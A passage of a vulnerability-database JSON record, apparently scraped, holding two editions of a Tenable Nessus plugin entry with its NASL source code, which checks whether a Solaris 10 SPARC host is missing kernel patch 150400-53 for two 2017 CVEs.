can result in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-02-21T01:37:12", "references": [{"idList": ["CVE-2017-10004", "CVE-2017-10122"], "type": "cve"}, {"idList": ["SOLARIS10_150400-51.NASL", "SOLARIS10_X86_150401-51.NASL", "SOLARIS10_150400-52.NASL", "SOLARIS10_X86_150401-52.NASL", "SOLARIS10_X86_150401-53.NASL", "SOLARIS_JUL2017_SRU11_3_21_5_0.NASL"], "type": "nessus"}, {"idList": ["ORACLE:CPUJUL2017-3236622"], "type": "oracle"}, {"idList": ["1337DAY-ID-30020", "1337DAY-ID-30984", "1337DAY-ID-29403", "1337DAY-ID-29207", "1337DAY-ID-29575", "1337DAY-ID-29087", "1337DAY-ID-29361", "1337DAY-ID-30017"], "type": "zdt"}]}, "score": {"modified": "2019-02-21T01:37:12", "value": 5.8, "vector": "NONE"}}, "hash": "06fe8f2eff555099eed1ff266ae8b5658c58db36f60f311b2f7a13edb9a679ae", "hashmap": [{"hash": "be2073bfad5e624acf0f878f09eda795", "key": "naslFamily"}, {"hash": "3090dd198212a266b7086a3d36e3a74a", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "2f557dd1a5dfe7846d859df9ecc45cb4", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a65f3b2757aa383cbd16c808875a4fb9", "key": "href"}, {"hash": "e7f4914c59abc9de638d32345d9e39f8", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "16f33654c4ccc8bcf258d99cea152296", "key": "description"}, {"hash": "9b693da47adba5957bc32ade1e81b10f", "key": "modified"}, {"hash": "0e2de2f910ca127ad179eb481fe7c6b1", "key": "references"}, {"hash": "b02ba0108bebf04af1fc81be81a6b920", "key": "pluginID"}, {"hash": "cea8147bf5d9fafd75da0830e93a2ee0", "key": "title"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=107721", "id": "SOLARIS10_150400-53.NASL", "lastseen": "2019-02-21T01:37:12", "modified": "2018-10-26T00:00:00", "naslFamily": "Solaris Local Security Checks", "objectVersion": "1.3", "pluginID": "107721", "published": "2018-03-12T00:00:00", "references": ["https://getupdates.oracle.com/readme/150400-53"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/10/26 10:53:24\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdcar\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdrcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWdtrp\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWefcl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfmd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWfss\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWftdur\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWhermon\", version:\"11.10.0,REV=2007.06.20.13.33\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWintgige\", version:\"11.10.0,REV=2005.09.15.00.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWiopc\", version:\"11.10.0,REV=2006.07.11.11.28\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWipoib\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWkvm\", version:\"11.10.0,REV=2005.08.04.12.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomr\", version:\"11.10.0,REV=2006.10.04.00.26\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWldomu\", version:\"11.10.0,REV=2006.08.08.12.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdb\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdbr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWmptsas\", version:\"11.10.0,REV=2009.07.14.02.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWn2cp\", version:\"11.10.0,REV=2007.07.08.21.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfscu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfsskr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWnfssu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpd\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpdu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWperl584core\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpiclu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpkcs11kms\", version:\"11.10.0,REV=2011.06.03.09.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWpmu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandr\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs8brandu\", version:\"11.10.0,REV=2007.10.08.16.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandr\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWs9brandu\", version:\"11.10.0,REV=2008.04.24.03.37\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWsmapi\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWssad\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWtoo\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust1\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWust2\", version:\"11.10.0,REV=2007.07.08.17.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfskr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsr\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWzfsu\", version:\"11.10.0,REV=2006.05.18.02.15\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FJSVhea / FJSVmdbr / FJSVpiclu / SUNWarc / SUNWarcr / SUNWbtool / etc\");\n}\n", "title": "Solaris 10 (sparc) : 150400-53", "type": "nessus", "viewCount": 25}, "differentElements": ["cvss", "description", "reporter", "modified", "cpe", "sourceData", "href"], "edition": 6, "lastseen": "2019-02-21T01:37:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:solaris:10:150400", "cpe:/o:oracle:solaris:10"], "cvelist": ["CVE-2017-10004", "CVE-2017-10122"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:33:01", "references": [{"idList": ["CVE-2017-10004", "CVE-2017-10122"], "type": "cve"}, {"idList": ["SOLARIS10_150400-51.NASL", "SOLARIS10_X86_150401-51.NASL", "SOLARIS10_150400-52.NASL", "SOLARIS10_X86_150401-52.NASL", "SOLARIS10_X86_150401-53.NASL", "SOLARIS_JUL2017_SRU11_3_21_5_0.NASL"], "type": "nessus"}, {"idList": ["ORACLE:CPUJUL2017-3236622"], "type": "oracle"}, {"idList": ["1337DAY-ID-30020", "1337DAY-ID-30984", "1337DAY-ID-29403", "1337DAY-ID-29207", "1337DAY-ID-29575", "1337DAY-ID-29087", "1337DAY-ID-29361", "1337DAY-ID-30017"], "type": "zdt"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "b010decf10c3ac7049ccd0e5da17a3d6106b26a916cc23cf18faa3973cd7e31d", "hashmap": [{"hash": "be2073bfad5e624acf0f878f09eda795", "key": "naslFamily"}, {"hash": "3090dd198212a266b7086a3d36e3a74a", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "2f557dd1a5dfe7846d859df9ecc45cb4", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5a88ad0a23edad02ee3a4d404f1bd9d0", "key": "description"}, {"hash": "a65f3b2757aa383cbd16c808875a4fb9", "key": "href"}, {"hash": "e7f4914c59abc9de638d32345d9e39f8", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "9b693da47adba5957bc32ade1e81b10f", "key": "modified"}, {"hash": "0e2de2f910ca127ad179eb481fe7c6b1", "key": "references"}, {"hash": "b02ba0108bebf04af1fc81be81a6b920", "key": "pluginID"}, {"hash": "cea8147bf5d9fafd75da0830e93a2ee0", "key": "title"}, {"hash": "5850355f6181ab9617cc0d094e464031", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=107721", "id": "SOLARIS10_150400-53.NASL", "lastseen": "2019-01-16T20:33:01", "modified": "2018-10-26T00:00:00", "naslFamily": "Solaris Local Security Checks", "objectVersion": "1.3", "pluginID": "107721", "published": "2018-03-12T00:00:00", "references": ["https://getupdates.oracle.com/readme/150400-53"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107721);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/10/26 10:53:24\");\n\n script_cve_id(\"CVE-2017-10004\", \"CVE-2017-10122\");\n\n script_name(english:\"Solaris 10 (sparc) : 150400-53\");\n script_summary(english:\"Check for patch 150400-53\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 150400-53\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Easily exploitable vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks of this vulnerability can\nresult in takeover of Solaris.\n\nVulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Kernel). Supported versions that are affected are\n10 and 11. Difficult to exploit vulnerability allows high privileged\nattacker with logon to the infrastructure where Solaris executes to\ncompromise Solaris. Successful attacks require human interaction from\na person other than the attacker. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/150400-53\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 150400-53\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:150400\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVhea\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVmdbr\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"FJSVpiclu\", version:\"11.10.0,REV=2005.01.20.17.25\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWarcr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWbtool\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcakr\", version:\"11.10.0,REV=2005.08.25.02.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcar\", version:\"11.10.0,REV=2005.08.10.02.13\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWckr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcpr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcry\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcryr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsl\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcslr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"150400-53\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", 